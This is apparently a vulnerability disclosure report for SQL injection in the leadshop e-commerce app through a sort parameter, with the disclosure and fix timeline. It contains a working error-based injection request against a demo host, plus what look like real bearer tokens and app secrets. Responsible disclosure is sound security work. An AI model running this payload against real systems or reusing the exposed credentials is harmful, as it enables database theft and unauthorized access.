SQL injection at exportUsers function in qmpaas/leadshop

Valid

Reported on

May 26th 2022


Description

SQL injection at exportUsers function via sort query parameter

Proof of Concept

GET /index.php?q=/api/leadmall/statistical&behavior=exportGoods&sort={"updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)--+-":"asd"} HTTP/1.1
Host: demo.leadshop.vip
Cookie: _csrf=fefe3c31fa6dbee72cd8e6a1e3b010398cfeed682f0198b879af18dbd5d5e5c8a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22SQDJuf-G631HB3SFwAjpH8ZW9XfM-nci%22%3B%7D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: application/json, text/plain, */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiIsImp0aSI6Ijk4YzA4YzI1ZjgxMzZkNTkwYyJ9.eyJpc3MiOiJodHRwOlwvXC9kZW1vLmxlYWRzaG9wLnZpcCIsImF1ZCI6Imh0dHBzOlwvXC9kZW1vLmxlYWRzaG9wLnZpcCIsImp0aSI6Ijk4YzA4YzI1ZjgxMzZkNTkwYyIsImlhdCI6MTY1MzU4MzAxNiwiZXhwIjoxNjU2MTc1MDE2LCJpZCI6MX0.O11reWZxDohDWiW9eqeTK0mvvxVy_xwwM4h7g5lwjXs
Qm-App-Type: undefined
Qm-App-Id: 98c08c25f8136d590c
Qm-App-Secret: 3AYpU16dZ1CY7ejqvrE39B351vanLJVD
Origin: https://demo.leadshop.vip
Referer: https://demo.leadshop.vip/index.php?r=admin%2Findex
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Pwnfox-Color: red
Te: trailers
Connection: close

Poc Image

image

Impact

An attacker can modify the query and can retrieve all data in database.

We are processing your report and will contact the qmpaas/leadshop team within 24 hours. 2 months ago
We have contacted a member of the qmpaas/leadshop team and are waiting to hear back 2 months ago
We have sent a follow up to the qmpaas/leadshop team. We will try again in 7 days. 2 months ago
Nhien.IT
2 months ago

Researcher


Hi @maintainer,

Can you review my report?

We have sent a second follow up to the qmpaas/leadshop team. We will try again in 10 days. 2 months ago
Nhien.IT
2 months ago

Researcher


Hi @admin, any update here?

Jamie Slome
2 months ago

Admin


No update. Let's wait for the remaining notifications to go out to the maintainer. Once the final notification has been sent, feel free to get in touch again, and I will reach out to the maintainers on your behalf 👍

We have sent a third and final follow up to the qmpaas/leadshop team. This report is now considered stale. 2 months ago
Nhien.IT
a month ago

Researcher


Hi @admin, look like Maintainer fixed at https://github.com/qmpaas/leadshop/commit/44dba1c86b7b2cfcd4594a25335f8628b650d37e#diff-2f55bd65e7f3d17890b89a77f76ee040e12d09519ff5668c12ffefc40ecdb2cc

leadshop开源商城 validated this vulnerability a month ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
leadshop开源商城 confirmed that a fix has been merged on 44dba1 a month ago
leadshop开源商城 has been awarded the fix bounty
Nhien.IT
a month ago

Researcher


@admin can we assign a CVE to this vulnerability?

Jamie Slome
a month ago

Admin


We can, as long as the maintainer is happy to assign and publish one for this report.

@maintainer?

to join this conversation